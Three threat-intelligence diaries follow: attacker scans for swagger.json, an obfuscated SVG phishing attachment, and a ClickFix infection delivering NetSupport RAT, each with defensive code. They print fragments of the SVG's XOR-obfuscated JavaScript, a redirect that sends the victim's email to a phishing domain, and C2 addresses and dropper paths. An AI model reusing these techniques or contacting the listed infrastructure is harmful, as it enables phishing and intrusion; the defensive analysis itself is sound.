Continuing Scans for swagger.json

Enterprise applications often still use complex standards like SOAP for web services. The big advantage of SOAP is its tight and extensive standards, which enable interoperability across an enterprise governed by web services. SOAP has two disadvantages. First, while it is de facto usually used over HTTP, it does not leverage HTTP, leading to unnecessary complexity. Second, kids don't RTFM, and developers these days tend not to appreciate the art of careful system design; they would rather throw code at an IDE to see what sticks, if they don't vibe code it anyway.

So the answer to all of the calls for a simpler standard is the non-standard REST. REST is more a "living standard" defined by commonly used libraries that happen to be popular right now. One of these standards is Swagger, or OpenAPI [1]. A very popular part of Swagger is "swagger.json", a file that defines how to use an API. Some people here may remember "WSDL"s, or good old ".h" files in C/C++. Same idea, but now with more JSON.

From a web application security perspective, swagger.json is like a directory listing for an API. These files are not inherently evil or insecure, and they are often necessary to allow developers to connect to an API efficiently. On the other hand, they are also a great roadmap for attackers, so it is no surprise that attackers are looking for them. Not only do they provide a list of API features, but metadata in the description will usually identify the underlying application, which makes them a great way to find vulnerable applications.
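To make the "roadmap" point concrete, here is a minimal sketch of what anyone who retrieves such a file can pull out of it in a few lines. The sample document, its title, version, and paths are all made up for illustration; real files are usually much larger.

```python
import json

# Hypothetical, minimal Swagger 2.0 document used only for illustration.
SAMPLE = """
{
  "swagger": "2.0",
  "info": {"title": "Example Inventory API", "version": "1.4.2"},
  "basePath": "/api/v1",
  "paths": {
    "/items": {"get": {}, "post": {}},
    "/items/{id}": {"get": {}, "delete": {}},
    "/admin/export": {"get": {}}
  }
}
"""

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}


def summarize(doc: dict) -> dict:
    """Return the application metadata and the list of operations in a spec."""
    info = doc.get("info", {})
    operations = []
    for path, item in sorted(doc.get("paths", {}).items()):
        for method in sorted(item):
            # Path items may also hold non-method keys such as "parameters".
            if method.lower() in HTTP_METHODS:
                operations.append(f"{method.upper()} {path}")
    return {
        "title": info.get("title"),
        "version": info.get("version"),
        "operations": operations,
    }


if __name__ == "__main__":
    summary = summarize(json.loads(SAMPLE))
    print(summary["title"], summary["version"])
    for operation in summary["operations"]:
        print(operation)
```

The title and version are what lets an attacker match the API against known vulnerabilities, and the operation list tells them where to start poking.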

Here are some of the top URLs attackers have been scanning for recently:

| URL | First Seen | Last Seen | Number of Requests |
|---|---|---|---|
| /swagger.json | 2020-12-28 | 2026-06-03 | 32,499 |
| /api/v2/swagger.json | 2021-01-03 | 2026-06-02 | 14,536 |
| /swagger/v1/swagger.json | 2020-12-28 | 2026-06-03 | 13,791 |
| /api/swagger.json | 2020-12-28 | 2026-06-03 | 11,100 |
| /api-docs/swagger.json | 2020-12-28 | 2026-06-03 | 8,693 |
| /v1/swagger.json | 2021-01-03 | 2026-06-02 | 7,482 |
| /apidocs/swagger.json | 2021-01-03 | 2026-04-26 | 6,517 |
| /api/v1/swagger.json | 2021-03-03 | 2026-06-02 | 6,495 |
| /v2/swagger.json | 2021-08-07 | 2026-06-03 | 1,026 |
| /api/api-docs/swagger.json | 2020-12-28 | 2026-05-12 | 945 |

And some that started showing up more recently:

| URL | First Seen | Last Seen | Number of Requests |
|---|---|---|---|
| /%2Fswagger.json | 2026-04-03 | 2026-04-22 | 20 |
| /swagger/v2/api-docs/service/swagger.json | 2026-02-27 | 2026-05-24 | 17 |
| /swagger/v3/api-docs/service/swagger.json | 2026-02-27 | 2026-05-24 | 17 |
| /26-166/api-docs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /73/api/apidocs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /hsd1/api/swagger-ui/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /69/api/api-docs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /166/api-docs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /c/api-docs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |
| /26-166/api/api-docs/swagger.json | 2026-01-21 | 2026-04-18 | 2 |



The number of requests is continuously high, but there are spikes and slow times:

But the continuing interest shows that attackers see value here.

What's the lesson? Should you stop using swagger.json? Probably not. Your developers need it. On the other hand, you should be scanning for swagger.json files preemptively in your environment to identify inappropriately published swagger.json files. My intro remarks about REST, while obviously an attempt to finally get someone to read these posts, also point out that with REST, some important design decisions are left up to you, and with lots of freedom comes lots of possibilities to mess things up.
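As a starting point for that kind of preemptive check, here is a rough sketch using only the Python standard library. It requests the most frequently scanned paths from the first table against a base URL you are responsible for and reports any response that parses as an API description. The function names, the 5 MB read limit, and the test for a top-level "swagger" or "openapi" key are my own choices for this sketch, not a complete detection method.

```python
import http.client
import json
import sys
import urllib.error
import urllib.request

# Paths taken from the table of most-requested URLs above.
CANDIDATE_PATHS = [
    "/swagger.json",
    "/api/v2/swagger.json",
    "/swagger/v1/swagger.json",
    "/api/swagger.json",
    "/api-docs/swagger.json",
    "/v1/swagger.json",
    "/apidocs/swagger.json",
    "/api/v1/swagger.json",
    "/v2/swagger.json",
    "/api/api-docs/swagger.json",
]


def candidate_urls(base_url: str) -> list[str]:
    """Combine a base URL such as 'https://host' with each candidate path."""
    base = base_url.rstrip("/")
    return [base + path for path in CANDIDATE_PATHS]


def looks_like_api_spec(body: bytes) -> bool:
    """True if the body is a JSON object with a top-level 'swagger' or 'openapi' key."""
    try:
        doc = json.loads(body)
    except ValueError:  # covers invalid JSON and undecodable bytes
        return False
    return isinstance(doc, dict) and ("swagger" in doc or "openapi" in doc)


def find_exposed_specs(base_url: str, timeout: float = 5.0) -> list[str]:
    """Request every candidate URL and return those that serve an API description."""
    found = []
    for url in candidate_urls(base_url):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                # Read at most 5 MB; larger documents will fail to parse and be skipped.
                if resp.status == 200 and looks_like_api_spec(resp.read(5_000_000)):
                    found.append(url)
        except (urllib.error.URLError, http.client.HTTPException, OSError):
            continue  # 404s, timeouts, refused connections, malformed responses
    return found


if __name__ == "__main__":
    for base in sys.argv[1:]:
        for hit in find_exposed_specs(base):
            print(hit)
```

Whether a hit is "inappropriately published" is still a judgment call: an internal developer portal serving the file is fine, the same file on an internet-facing production host may not be.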

Any comments on good tools to do so? (Yes, more engagement farming, but maybe it will cause me to fix the comment system for this site.)

[1] https://swagger.io/specification/

--

Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


New Wave Of Phishing Emails with SVG Files

For the past few days, my SANS ISC mailbox has been flooded with emails that deliver SVG files. SVG ("Scalable Vector Graphics") is a web-friendly vector file format used for graphics and icons. No URL in the body, just “an image”: that’s the perfect way to deliver malicious content. This isn’t the first time that we have seen this technique used by threat actors[1].



This time, the SVG files are really simple and even don’t contain any graphical element but a simple piece of JavaScript that will redirect the victim's browser to the phishing page:

With the current wave, I just detected regular phishing pages but it could be any payload.

The variable “nl” contains the targeted email address:

nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // “handlers@sans.edu”

The interesting payload is in “oa”: it contains a Base64-encoded and XOR’d string. The XOR key is in “bd”:

const pt = "b19208caeefa"; const rm = "51d1e7dcd384"; const bd = pt + rm;

The payload is decoded here:

const cx = ['b', 'style', 'o', 't', 'a'];

const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')];

const ts = kf(oa);

const rabbit = Uint8Array.from(ts, (aa, ak) =>

aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length)

);

Finally, the variable “rabbit” is used to perform the redirect in the browser:

window.location.href = "hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/" + "handlers@sans.edu";
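The decoding steps above are easy to reproduce offline without letting a browser touch the file. The array lookup assigned to “kf” spells "atob", so the script Base64-decodes “oa” and then XORs every byte with the repeating 24-character key. Here is a small sketch of the same logic. The value of “oa” is not reproduced in this diary, so the example builds its own test payload with a made-up URL, and stripping the leading "$" from “nl” is my assumption about how the script treats that marker.

```python
import base64

# XOR key from the sample: the concatenation of "pt" and "rm".
KEY = ("b19208caeefa" + "51d1e7dcd384").encode("ascii")


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR every byte with the key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(oa: str, key: bytes = KEY) -> str:
    """Mirror the script: atob(), then XOR each byte with the repeating key."""
    return xor_with_key(base64.b64decode(oa), key).decode("utf-8", errors="replace")


def encode_payload(plaintext: str, key: bytes = KEY) -> str:
    """Inverse helper, used here only to build a test value."""
    return base64.b64encode(xor_with_key(plaintext.encode("utf-8"), key)).decode("ascii")


def decode_target(nl: str) -> str:
    """Decode the "nl" value; assumes the leading "$" is a marker to strip."""
    return base64.b64decode(nl.lstrip("$")).decode("utf-8")


if __name__ == "__main__":
    print(decode_target("$aGFuZGxlcnNAc2Fucy5lZHU="))  # handlers@sans.edu
    # Hypothetical payload, encoded with the sample's key for a round-trip check.
    sample = encode_payload("https://example.test/landing/")
    print(decode_payload(sample))
```

Because XOR is its own inverse, the same helper both encodes and decodes, which makes it simple to verify the routine before feeding it a real “oa” value.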

This technique works because, on the Windows operating system, SVG files are opened by the browser by default. Note the TLD used (".cfd"), which stands for "Clothing, Fashion, and Design". It's a cheap TLD that is increasingly abused in phishing campaigns[2].

A final note about the MIME type used in the SVG file:

<script type="application/ecmascript">

This is an official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[3]. It was probably used to defeat some common security controls that look for the string "JavaScript".
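A filter that keys on the element rather than on the string "JavaScript" is not fooled by the alternate MIME type. The sketch below flags any script element, whatever its type attribute says, plus inline event handler attributes. It uses Python's standard XML parser, which is not hardened against malicious XML, so treat it as an illustration; for untrusted attachments a hardened parser such as defusedxml may be a better fit. The sample SVG is a stripped-down stand-in, not the actual attachment.

```python
import xml.etree.ElementTree as ET

# Stand-in for the attachment: no graphics, only a script element.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
  <script type="application/ecmascript">/* redirect code */</script>
</svg>"""


def local_name(tag: str) -> str:
    """Strip an XML namespace such as '{http://www.w3.org/2000/svg}script'."""
    return tag.rsplit("}", 1)[-1].lower()


def find_active_content(svg_text: str) -> list[str]:
    """List script elements and on* event handler attributes found in an SVG.

    Raises xml.etree.ElementTree.ParseError if the input is not well-formed XML.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for element in root.iter():
        name = local_name(element.tag)
        if name == "script":
            # The type attribute is reported but deliberately not used to decide.
            findings.append(f"<script> element (type={element.get('type')!r})")
        for attr in element.attrib:
            if local_name(attr).startswith("on"):
                findings.append(f"event handler attribute {attr!r} on <{name}>")
    return findings


if __name__ == "__main__":
    for finding in find_active_content(SAMPLE_SVG):
        print(finding)
```

For an image attachment in email, any finding at all is a good reason to quarantine: legitimate icons and logos rarely need script.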

[1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456

[2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d

[3] https://github.com/sudheerj/ECMAScript-features

Xavier Mertens (@xme)

Xameco

Senior ISC Handler - Freelance Cyber Security Consultant


Unidentified RAT pushes NetSupport RAT

Introduction



This diary provides indicators from an unidentified RAT infection on Wednesday 2026-05-27 that was followed by a malicious NetSupport Manager RAT package. This originated from the SmartApeSG ClickFix campaign. I still don't know the name of the initial RAT, but it has consistently been generating encoded (not HTTPS/SSL/TLS) traffic to a command and control (C2) server at 89.110.110[.]119 over TCP port 443 since I first noticed it sometime in April 2026.

Images from the infection

Shown above: Fake verification page with ClickFix instructions from the SmartApeSG campaign.





Shown above: Initial RAT malware on an infected Windows host.

Shown above: Follow-up files for NetSupport RAT sent through the initial RAT C2 traffic.



Shown above: NetSupport RAT C2 traffic.

Indicators of Compromise

Example of SmartApeSG URLs seen on Wednesday 2026-05-27:

- hxxps[:]//hiddenplanetlab[.]top/signin/secure-util.js

- hxxps[:]//hiddenplanetlab[.]top/signin/private-template?c66kjD5i

- hxxps[:]//hiddenplanetlab[.]top/signin/legacy-worker.js?18b3825af007e53d

Example of traffic generated by running the associated ClickFix script:

- hxxp[:]//178.156.165[.]82/

- hxxp[:]//178.156.173[.]194/

- hxxps[:]//silverharvestnetwork[.]com/check

Initial RAT C2 traffic:

- tcp[:]//89.110.110[.]119:443/

IP address for NetSupport RAT C2 server:

- hxxp[:]//185.163.47[.]217:443
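Both C2 channels listed above use TCP port 443 without TLS: the initial RAT sends encoded, non-TLS traffic, and the NetSupport RAT indicator is an hxxp URL on port 443. That mismatch is something you can hunt for. Here is a rough heuristic that classifies the first bytes a client sends on port 443. The function names and the three labels are my own, and how you obtain the first payload bytes (from a pcap, a proxy, or a sensor) is left out of this sketch.

```python
def looks_like_tls_handshake(first_bytes: bytes) -> bool:
    """Heuristic: does the payload start with a TLS handshake record header?

    A TLS record starts with a 1-byte content type (0x16 = handshake),
    a 2-byte protocol version (major 0x03, minor 0x00-0x04), and a 2-byte length.
    """
    if len(first_bytes) < 5:
        return False
    content_type, major, minor = first_bytes[0], first_bytes[1], first_bytes[2]
    return content_type == 0x16 and major == 0x03 and minor <= 0x04


def looks_like_plain_http(first_bytes: bytes) -> bool:
    """Heuristic: does the payload start with a common HTTP request method?"""
    methods = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"CONNECT ")
    return first_bytes.startswith(methods)


def classify_port_443_payload(first_bytes: bytes) -> str:
    """Label the first client payload seen on TCP port 443."""
    if looks_like_tls_handshake(first_bytes):
        return "tls"
    if looks_like_plain_http(first_bytes):
        return "plain-http"
    return "unknown-non-tls"


if __name__ == "__main__":
    # Made-up payloads for illustration only.
    print(classify_port_443_payload(bytes([0x16, 0x03, 0x01, 0x02, 0x00, 0x01])))
    print(classify_port_443_payload(b"POST /example HTTP/1.1\r\n"))
    print(classify_port_443_payload(b"\x8a\x01\x02\x03\x04\x05"))
```

Anything that is not "tls" on port 443 deserves a second look, although you should expect some false positives from legitimate software that reuses the port.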

Files from the infection:

SHA256 hash: 1514b1268e9dc6d2f37137aa38c756cb4bf8186ac9235d6863b78e7f8bbbe976

- File size: 26,555,757 bytes

- File type: Zip archive data, at least v2.0 to extract

- File location: hxxps[:]//silverharvestnetwork[.]com/check

- File description: Zip archive containing software package for the initial RAT.

SHA256 hash: 469bac8e10f50263e8ff0806e6ba126bb4cc660799129a8653eab3f8ec7201e5

- File size: 109 bytes

- File type: ASCII text

- File location: C:\ProgramData\processor.vbs

- File description: Initial script that runs token.bat

SHA256 hash: 9c7eda2c4d3aaa8746495741bef57a07de180f0409409faf0f91658e88ba33f5

- File size: 8,262 bytes

- File type: DOS batch file text, ASCII text, with very long lines

- File location: C:\ProgramData\token.bat

- File description: Batch script that extracts, runs, and makes persistent NetSupport RAT from setup.cab

SHA256 hash: 7ba5481c873bb3081442561f749f590badd72ef249fddfe993e30b28dc0c2112

- File size: 17,275,805 bytes

- File type: Microsoft Cabinet archive data

- File location: C:\ProgramData\setup.cab

- File description: CAB file containing malicious NetSupport RAT package

- Contents of this CAB file extracted to: C:\ProgramData\UpdateInstaller\
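To check files you have collected (for example, from quarantine or extracted from a packet capture) against the hashes above, something like the following works. The labels in the dictionary are shorthand for the file descriptions above, and the function names are my own.

```python
import hashlib
import sys
from pathlib import Path
from typing import Optional

# SHA256 hashes listed in this diary, with a short label for each file.
KNOWN_HASHES = {
    "1514b1268e9dc6d2f37137aa38c756cb4bf8186ac9235d6863b78e7f8bbbe976": "zip archive for the initial RAT",
    "469bac8e10f50263e8ff0806e6ba126bb4cc660799129a8653eab3f8ec7201e5": "processor.vbs",
    "9c7eda2c4d3aaa8746495741bef57a07de180f0409409faf0f91658e88ba33f5": "token.bat",
    "7ba5481c873bb3081442561f749f590badd72ef249fddfe993e30b28dc0c2112": "setup.cab",
}


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so that large archives do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_known(path: Path) -> Optional[str]:
    """Return the label of the matching indicator, or None if there is no match."""
    return KNOWN_HASHES.get(sha256_of_file(path))


if __name__ == "__main__":
    for arg in sys.argv[1:]:
        label = match_known(Path(arg))
        print(f"{arg}: {label or 'no match'}")
```

Keep in mind that hash matches only catch these exact files, so a miss says little about whether a host is clean.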

Note 1: The files processor.vbs, token.bat, and setup.cab are all deleted by the token.bat script after it installs the malicious NetSupport RAT package and makes it persistent on the infected Windows host.

Note 2: The indicators for this activity (domains, file hashes, etc.) change on a daily basis. For more up-to-date indicators on SmartApeSG and similar campaigns, see the @monitorsg feed on Mastodon.
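Since the indicators rotate daily, you will probably want to feed them into blocklists or log searches automatically rather than retyping them. The indicators in this diary are defanged ("hxxp", "[:]", "[.]"), so they need to be converted back first. Here is a minimal sketch that handles only the defanging conventions used in this diary; other sources use other conventions, and the function names are my own.

```python
import re
from urllib.parse import urlsplit


def refang(indicator: str) -> str:
    """Undo the defanging used in this diary: hxxp(s), [:] and [.]."""
    text = indicator.strip()
    text = re.sub(r"^hxxp", "http", text, flags=re.IGNORECASE)
    return text.replace("[:]", ":").replace("[.]", ".")


def host_of(indicator: str) -> str:
    """Return the hostname or IP address of a defanged URL-style indicator."""
    return urlsplit(refang(indicator)).hostname or ""


if __name__ == "__main__":
    indicators = [
        "hxxps[:]//hiddenplanetlab[.]top/signin/secure-util.js",
        "hxxps[:]//silverharvestnetwork[.]com/check",
        "tcp[:]//89.110.110[.]119:443/",
        "hxxp[:]//185.163.47[.]217:443",
    ]
    # Print only the hosts, which is usually what a blocklist needs.
    for item in indicators:
        print(host_of(item))
```

Keep the refanged values inside your tooling; anything you paste into a ticket or a chat should stay defanged.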

---

Bradley Duncan

brad [at] malware-traffic-analysis.net
